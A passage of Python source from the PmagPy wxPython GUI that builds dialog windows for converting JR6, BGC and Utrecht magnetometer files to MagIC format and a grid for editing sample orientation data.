self.bSizer3 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ----\n self.bSizer6 = pw.site_lat_lon(pnl)\n\n #---sizer 5 ----\n self.bSizer5 = pw.replicate_measurements(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.AddMany([(self.bSizer0a,wx.ALIGN_LEFT|wx.TOP), (self.bSizer0b,wx.ALIGN_LEFT|wx.TOP)])\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1d, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1c, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1b, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_check_joides(self, event):\n if self.bSizer0b.cb.IsChecked():\n self.bSizer0a.ShowItems(False)\n self.bSizer1.ShowItems(False)\n self.bSizer1a.ShowItems(False)\n self.bSizer2.ShowItems(False)\n self.bSizer3.ShowItems(False)\n self.bSizer4.ShowItems(False)\n self.bSizer1b.ShowItems(True)\n self.bSizer1c.ShowItems(True)\n self.bSizer1d.ShowItems(True)\n else:\n self.bSizer1b.ShowItems(False)\n self.bSizer1c.ShowItems(False)\n self.bSizer1d.ShowItems(False)\n self.bSizer0a.ShowItems(True)\n self.bSizer1.ShowItems(True)\n self.bSizer1a.ShowItems(True)\n self.bSizer2.ShowItems(True)\n self.bSizer3.ShowItems(True)\n self.bSizer4.ShowItems(True)\n self.panel.Layout()\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_add_sampfile_button(self, event):\n text = \"choose samples type file\"\n pw.on_add_file_button(self.bSizer0c, text)\n\n def on_okButton(self, event):\n samp_file = ''\n options = {}\n input_format = self.bSizer0a.return_value()\n JR = self.bSizer0b.return_value()\n if input_format:\n input_format = 'txt'\n else:\n input_format = 'jr6'\n output_dir_path = self.WD\n options['dir_path'] = str(output_dir_path)\n input_dir_path, mag_file = os.path.split(self.bSizer0.return_value())\n if not mag_file:\n pw.simple_warning(\"You must select a JR6 format file\")\n return False\n options['input_dir_path'], options['mag_file'] = str(input_dir_path), str(mag_file)\n meas_file = os.path.split(mag_file)[1]+\".magic\"\n options['meas_file'] = str(meas_file)\n spec_file = os.path.split(mag_file)[1]+\"_specimens.txt\"\n options['spec_file'] = str(spec_file)\n samp_file = os.path.split(mag_file)[1]+\"_samples.txt\"\n options['samp_file'] = str(samp_file)\n site_file = os.path.split(mag_file)[1]+\"_sites.txt\"\n options['site_file'] = str(site_file)\n loc_file = os.path.split(mag_file)[1]+\"_locations.txt\"\n options['loc_file'] = str(loc_file)\n specnum = self.bSizer2.return_value()\n options['specnum'] = specnum\n samp_con = self.bSizer3.return_value()\n options['samp_con'] = samp_con\n user = self.bSizer1b.return_value()\n options['user'] = str(user)\n location = self.bSizer4.return_value()\n if location!='':\n options['location'] = str(location)\n expedition = self.bSizer1c.return_value()\n options['expedition'] = str(expedition)\n site = self.bSizer1d.return_value()\n options['site'] = str(site)\n average = self.bSizer5.return_value()\n if average:\n noave = 0\n else:\n noave = 1\n options['noave'] = noave\n meth_code = self.bSizer1.return_value()\n options['meth_code'] = meth_code\n try: lat,lon = self.bSizer6.return_value().split()\n except ValueError: lat,lon = '',''\n options['lat'] = lat\n options['lon'] = lon\n lat,lon = '-lat '+str(lat), '-lon '+str(lon)\n volume = self.bSizer1a.return_value()\n os.chdir(self.WD)\n COMMAND = \"\"\n\n # validate arguments;\n if volume!='':\n try:\n volume = float(volume)\n options['volume'] = volume\n except:\n pw.simple_warning(\"You must provide a valid quanity for volume, or no volume\")\n return False\n\n # validate file type and run jr6_magic:\n if not JR:\n if 'jr6' in input_format and 'jr6' not in mag_file.lower():\n pw.simple_warning(\"You must provide a .jr6 format file\")\n return False\n elif 'txt' in input_format and 'txt' not in mag_file.lower():\n pw.simple_warning(\"You must provide a .txt format file\")\n return False\n # remove unneeded options for jr6_txt/jr6_jr6\n for key in ['expedition', 'site']:\n try:\n options.pop(key)\n except KeyError:\n pass\n if input_format == 'txt': # .txt format\n program_ran, error_message = convert.jr6_txt(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.jr6_txt(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n else:\n program_ran, error_message = convert.jr6_jr6(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.jr6_jr6(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n else: # Joides Resolution\n if not mag_file:\n pw.simple_warning('You must provide a valid IODP JR6 file')\n program_ran, error_message = convert.iodp_jr6(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.iodp_jr6(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Raise()\n\n def on_helpButton(self, event):\n input_format = self.bSizer0a.return_value()\n if input_format:\n input_format = 'txt'\n else:\n input_format = 'jr6'\n if input_format == 'txt': # .txt format\n pw.on_helpButton(text=jr6_txt_magic.do_help())\n else:\n pw.on_helpButton(text=jr6_jr6_magic.do_help())\n\n\nclass convert_BGC_files_to_magic(wx.Frame):\n\n \"\"\" \"\"\"\n title = \"PmagPy BGC file conversion\"\n\n def __init__(self, parent, WD, title):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.WD = WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n\n text = \"convert Berkeley Geochronology Center file to MagIC format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=text), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1a ----\n self.bSizer1a = pw.labeled_text_field(pnl, 'User (Optional):')\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl, 'Location name:')\n\n #---sizer 2 ----\n self.bSizer2 = pw.labeled_text_field(pnl, 'Site name (if using convention bellow leave blank):')\n # sitename\n\n #---sizer 3 ----\n self.bSizer3 = pw.sampling_particulars(pnl)\n # meth codes\n\n #---sizer 4 ----\n self.bSizer4 = pw.replicate_measurements(pnl)\n # average replicates\n\n #---sizer 5 ---\n self.bSizer5 = pw.labeled_text_field(pnl, 'Provide specimen volume in cubic centimeters\\nNote: the volume given in data file will be used unless it equals 0.0 ')\n\n #---sizer 6 ----\n self.bSizer6 = pw.select_ncn(pnl)\n\n #---sizer 7 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer7 = pw.specimen_n(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n\n options = {}\n full_file = self.bSizer0.return_value()\n\n ID, infile = os.path.split(full_file)\n options['dir_path'] = self.WD\n options['input_dir_path'] = ID\n options['mag_file'] = infile\n outfile = infile + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = infile + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = infile + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = infile + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = infile + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n\n user = str(self.bSizer1a.return_value())\n options['user'] = str(user)\n loc_name = str(self.bSizer1.return_value())\n options['location'] = str(loc_name)\n site_name = self.bSizer2.return_value()\n if site_name!='': options['site'] = str(site_name)\n spec_num = self.bSizer7.return_value()\n options['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n ncn = self.bSizer6.return_value()\n options['samp_con'] = ncn\n\n meth_code = self.bSizer3.return_value()\n options['meth_code'] = meth_code\n\n average = self.bSizer4.return_value()\n options['noave'] = average\n\n volume = self.bSizer5.return_value()\n if volume:\n try:\n options['volume'] = float(volume)\n except ValueError:\n pw.simple_warning('You must provide a valid numerical value for specimen volume')\n return False\n\n for key, value in list(options.items()):\n print(key, value)\n\n COMMAND = \"options = {}\\convert.bgc(**options)\".format(str(options))\n\n if infile=='':\n all_files=[f for f in os.listdir('.') if os.path.isfile(f)]\n outfiles=[]\n for infile in all_files:\n options['mag_file'] = infile\n outfile = infile + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = infile + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = infile + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = infile + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = infile + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n try:\n program_ran, error_message = convert.bgc(**options)\n except IndexError:\n continue\n if program_ran:\n outfiles.append(outfile)\n outfile = str(outfiles)\n else:\n program_ran, error_message = convert.bgc(**options)\n\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Raise()\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.bgc.__doc__)\n\nclass convert_Utrecht_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"\n A GUI which allows easy input of meta data required to convert Utrecht\n Magnetometer files into MagIC format for analysis or contribution to the\n EarthRef MagIC Archive.\n \"\"\"\n\n def InitUI(self):\n \"\"\"\n Override of InitUI in parent class convert_files_to_MagIC.\n Creates UI for input of relavent data to convert Utrecht to MagIC.\n \"\"\"\n\n pnl = self.panel\n\n TEXT = \"Convert Utrecht Magnetometer file format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.select_ncn(pnl)\n\n #---sizer 3 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer3 = pw.specimen_n(pnl)\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 5 ---\n self.bSizer5 = pw.replicate_measurements(pnl)\n\n #---sizer 6 ----\n self.bSizer6 = pw.lab_field(pnl)\n\n #---sizer 7 ---\n TEXT= \"use the European date format (dd/mm/yyyy)\"\n self.bSizer7 = pw.check_box(pnl, TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.site_lat_lon(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n \"\"\"\n Complies information input in GUI into a kwargs dictionary which can\n be passed into the utrecht_magic script and run to output magic files\n \"\"\"\n os.chdir(self.WD)\n options_dict = {}\n wd = self.WD\n options_dict['dir_path'] = wd\n full_file = self.bSizer0.return_value()\n if not full_file:\n pw.simple_warning('You must provide a Utrecht format file')\n return False\n input_directory, Utrecht_file = os.path.split(full_file)\n options_dict['mag_file'] = Utrecht_file\n options_dict['input_dir_path'] = input_directory\n if input_directory:\n ID = \"-ID \" + input_directory\n else:\n ID = ''\n outfile = Utrecht_file + \".magic\"\n options_dict['meas_file'] = outfile\n spec_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_specimens.txt\"\n options_dict['spec_file'] = spec_outfile\n samp_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_samples.txt\"\n options_dict['samp_file'] = samp_outfile\n site_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_sites.txt\"\n options_dict['site_file'] = site_outfile\n loc_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_locations.txt\"\n options_dict['loc_file'] = loc_outfile\n dc_flag,dc_params = '',''\n if self.bSizer6.return_value() != '':\n dc_params = list(map(float,self.bSizer6.return_value().split()))\n options_dict['lab_field'] = dc_params[0]\n options_dict['phi'] = dc_params[1]\n options_dict['theta'] = dc_params[2]\n dc_flag = '-dc ' + self.bSizer6.return_value()\n spec_num = self.bSizer3.return_value()\n options_dict['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n loc_name = self.bSizer4.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n particulars = self.bSizer1.return_value()\n options_dict['meth_code'] = particulars\n if particulars:\n particulars = \"-mcd \" + particulars\n euro_date = self.bSizer7.return_value()\n if euro_date: options_dict['dmy_flag'] = True; dmy_flag='-dmy'\n else: options_dict['dmy_flag'] = False; dmy_flag=''\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n replicate = self.bSizer5.return_value()\n if replicate:\n options_dict['noave'] = True\n replicate = ''\n else:\n options_dict['noave'] = False\n replicate = '-A'\n\n COMMAND = \"utrecht_magic.py -WD {} -f {} -F {} {} {} {} -ncn {} {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} {} {} -lat {} -lon {}\".format(wd, Utrecht_file, outfile, particulars, spec_num, loc_name, ncn, ID, spec_outfile, samp_outfile, site_outfile, loc_outfile, replicate, dc_flag, dmy_flag, lon, lat)\n # to run as module:\n program_ran, error_message = convert.utrecht(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n \"\"\"\n Displays utrecht_magic scripts help message\n \"\"\"\n pw.on_helpButton(text=convert.utrecht.__doc__)\n\n\n# template for an import window\nclass something(wx.Frame):\n\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n text = \"Hello here is a bunch of text\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=text), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n\n #---sizer 2 ----\n\n #---sizer 3 ----\n\n #---sizer 4 ----\n\n #---sizer 5 ---\n\n #---sizer 6 ----\n\n #---sizer 7 ---\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, self.WD, event, text)\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n COMMAND = \"\"\n pw.run_command_and_close_window(self, COMMAND, outfile)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text='')\n\n\n#=================================================================\n# demag_orient:\n# read/write demag_orient.txt\n# calculate sample orientation\n#=================================================================\n\n\nclass OrientFrameGrid3(wx.Frame):\n def __init__(self, parent, id, title, WD, contribution, size):\n wx.Frame.__init__(self, parent, -1, title, size=size,\n name='calculate geographic directions')\n\n #--------------------\n # initialize stuff\n #--------------------\n self.parent = parent\n if sys.platform in ['win32', 'win64']:\n self.panel = wx.ScrolledWindow(self, style=wx.SIMPLE_BORDER|wx.ALWAYS_SHOW_SB)\n else:\n self.panel = wx.Panel(self, style=wx.SIMPLE_BORDER)\n\n self.WD = WD\n #self.Data_hierarchy = Data_hierarchy\n self.contribution = contribution\n\n # contribution has already propagated measurement data...\n if 'samples' not in self.contribution.tables:\n print('-E- No sample data available')\n samples_name_list = []\n else:\n samples_name_list = self.contribution.tables['samples'].df.index.unique()\n\n self.orient_data = {}\n try:\n fname = os.path.join(self.WD, \"demag_orient.txt\")\n self.orient_data, dtype, keys = pmag.magic_read_dict(fname, sort_by_this_name=\"sample_name\",\n return_keys=True)\n\n except Exception as ex:\n print(\"-W-\", ex)\n\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n # self.headers is a list of two-item tuples.\n #the first is the proper column name as understood by orientation_magic.py\n # the second is the name for display in the GUI\n self.header_display_names = [\"sample_name\", \"sample_orientation_flag\", \"mag_azimuth\",\n \"field_dip\", \"bedding_dip_direction\", \"bedding_dip\",\n \"shadow_angle\", \"latitude\", \"longitude\", \"mm/dd/yy\",\n \"hh:mm\", \"GPS_baseline\", \"GPS_Az\"]\n self.header_names = [\"sample_name\", \"sample_orientation_flag\", \"mag_azimuth\",\n \"field_dip\", \"bedding_dip_direction\", \"bedding_dip\",\n \"shadow_angle\", \"lat\", \"long\", \"date\",\n \"hhmm\", \"GPS_baseline\", \"GPS_Az\"]\n self.headers = list(zip(self.header_names, self.header_display_names))\n\n # get sample table and convert relevant headers to orient.txt format\n if (not self.orient_data) and ('samples' in self.contribution.tables):\n print(\"-I- Couldn't find demag_orient.txt, trying to extract information from samples table\")\n samp_container = self.contribution.tables['samples']\n # get lat/lon from sites if available\n if 'sites' in self.contribution.tables:\n site_contianer = self.contribution.tables['sites']\n self.contribution.propagate_cols(['lat', 'lon'], 'samples', 'sites')\n #\n raw_orient_data = samp_container.convert_to_pmag_data_list(\"dict\")\n # convert from 3.0. headers to orient.txt headers\n self.orient_data = {}\n orient_data = {}\n # must group to ensure that lat/lon/etc. are found no matter what\n df = samp_container.df\n res = df.T.apply(dict).groupby(df.index)\n for grouped in res:\n new_dict = {}\n ind_name = grouped[0]\n dictionaries = grouped[1]\n for dictionary in dictionaries:\n for key, value in dictionary.items():\n if key in new_dict:\n continue\n if (value and (value != 'None')) or (value == 0):\n new_dict[key] = value\n for key in dictionary.keys():\n if key not in new_dict:\n new_dict[key] = None\n orient_data[ind_name] = new_dict\n for key, rec in list(orient_data.items()):\n self.orient_data[key] = map_magic.mapping(rec, map_magic.magic3_2_orient_magic_map)\n # create grid\n self.create_sheet()\n\n TEXT = \"\"\"A template file named 'demag_orient.txt', for sample-level orientation data, was created in your MagIC working directory.\n\n You can view/modify demag_orient.txt here. To edit all the values in a column, click on the column header and then enter your desired value, or select an item from the drop-down menu.\n\n If you already have these data in MagIC format in Excel or Open Office, save the file as 'tab delimited' and then use the 'Import Orientation File' button below.\n\n After orientation data is filled in, you can Calculate sample orientations. Method codes will be added during this step. This will write orientation data to the site and sample tables.\n\"\"\"\n label_boxsizer = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, 'input orientation data ' ), wx.VERTICAL )\n # width, height\n label = wx.StaticText(self.panel, label=TEXT, size=(600, 200))\n btn_box = wx.BoxSizer(wx.HORIZONTAL)\n save_btn = wx.Button(self.panel, wx.ID_ANY, \"Save Orientation File\")\n self.Bind(wx.EVT_BUTTON, self.on_m_save_file, save_btn)\n import_btn = wx.Button(self.panel, wx.ID_ANY, \"Import Orientation File\")\n self.Bind(wx.EVT_BUTTON, self.on_m_open_file, import_btn)\n calculate_btn = wx.Button(self.panel, wx.ID_ANY, \"Calculate Sample Orientations\")\n self.Bind(wx.EVT_BUTTON, self.on_m_calc_orient, calculate_btn)\n btn_box.Add(save_btn)\n btn_box.Add(import_btn, flag=wx.LEFT, border=5)\n btn_box.Add(calculate_btn, flag=wx.LEFT, border=5)\n\n self.vbox = wx.BoxSizer(wx.VERTICAL)\n #\n label_boxsizer.Add(label, flag=wx.CENTRE)\n self.vbox.Add(label_boxsizer, flag=wx.CENTRE|wx.ALL, border=15)\n #self.vbox.Add(label, flag=wx.CENTRE|wx.ALL, border=15)\n self.vbox.Add(btn_box, flag=wx.CENTRE)\n self.vbox.Add(self.grid, flag=wx.ALL, border=20)\n self.hbox_all = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.Add(self.vbox)\n if sys.platform in ['win32', 'win64']:\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.panel.SetSizer(self.hbox_all)\n self.hbox_all.Fit(self)\n\n self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)\n # save the template\n self.on_m_save_file(None)\n self.Centre()\n self.Show()\n\n\n\n def create_sheet(self):\n '''\n create an editable grid showing demag_orient.txt\n '''\n #--------------------------------\n # orient.txt supports many other headers\n # but we will only initialize with\n # the essential headers for\n # sample orientation and headers present\n # in existing demag_orient.txt file\n #--------------------------------\n\n\n #--------------------------------\n # create the grid\n #--------------------------------\n\n samples_list = list(self.orient_data.keys())\n samples_list.sort()\n self.samples_list = [ sample for sample in samples_list if sample is not \"\" ]\n #self.headers.extend(self.add_extra_headers(samples_list))\n display_headers = [header[1] for header in self.headers]\n self.grid = magic_grid.MagicGrid(self.panel, 'orient grid',\n self.samples_list, display_headers)\n self.grid.InitUI()\n\n #--------------------------------\n # color the columns by groups\n #--------------------------------\n\n for i in range(len(self.samples_list)):\n self.grid.SetCellBackgroundColour(i, 0, \"LIGHT GREY\")\n self.grid.SetCellBackgroundColour(i, 1, \"LIGHT STEEL BLUE\")\n self.grid.SetCellBackgroundColour(i, 2, \"YELLOW\")\n self.grid.SetCellBackgroundColour(i, 3, \"YELLOW\")\n self.grid.SetCellBackgroundColour(i, 4, \"PALE GREEN\")\n self.grid.SetCellBackgroundColour(i, 5, \"PALE GREEN\")\n self.grid.SetCellBackgroundColour(i, 6, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 7, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 8, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 9, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 10, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 11, \"LIGHT MAGENTA\")\n self.grid.SetCellBackgroundColour(i, 12, \"LIGHT MAGENTA\")\n\n\n #--------------------------------\n # fill data from self.orient_data\n #--------------------------------\n\n headers = [header[0] for header in self.headers]\n for sample in self.samples_list:\n for key in list(self.orient_data[sample].keys()):\n if key in headers:\n sample_index = self.samples_list.index(sample)\n i = headers.index(key)\n val = str(self.orient_data[sample][key])\n # if it's a pmag_object, use its name\n try:\n val = val.name\n except AttributeError:\n pass\n if val and val != \"None\":\n self.grid.SetCellValue(sample_index, i, val)\n\n #--------------------------------\n\n #--------------------------------\n # fill in some default values\n #--------------------------------\n for row in range(self.grid.GetNumberRows()):\n col = 1\n if not self.grid.GetCellValue(row, col):\n self.grid.SetCellValue(row, col, 'g')\n\n #--------------------------------\n\n # temporary trick to get drop-down-menus to work\n self.grid.changes = {'a'}\n\n self.grid.AutoSize()\n self.drop_down_menu = drop_down_menus3.Menus(\"orient\", self.contribution, self.grid)\n self.Bind(wx.grid.EVT_GRID_LABEL_LEFT_CLICK, self.onLeftClickLabel, self.grid)\n\n def update_sheet(self):\n self.grid.Destroy()\n self.create_sheet()\n self.vbox.Add(self.grid, flag=wx.ALL, border=20)\n #self.Hide()\n #self.Show()\n self.hbox_all.Fit(self.panel)\n #self.panel.Refresh()\n self.Hide()\n self.Show()\n\n def onLeftClickLabel(self, event):\n \"\"\"\n When user clicks on a grid label, determine if it is a row label or a col label.\n Pass along the event to the appropriate function.\n (It will either highlight a column for editing all values, or highlight a row for deletion).\n \"\"\"\n #if event.Col == -1 and event.Row == -1:\n # pass\n #elif event.Col < 0:\n # self.onSelectRow(event)\n if event.Row < 0:\n self.drop_down_menu.on_label_click(event)\n\n\n def on_m_open_file(self,event):\n '''\n open 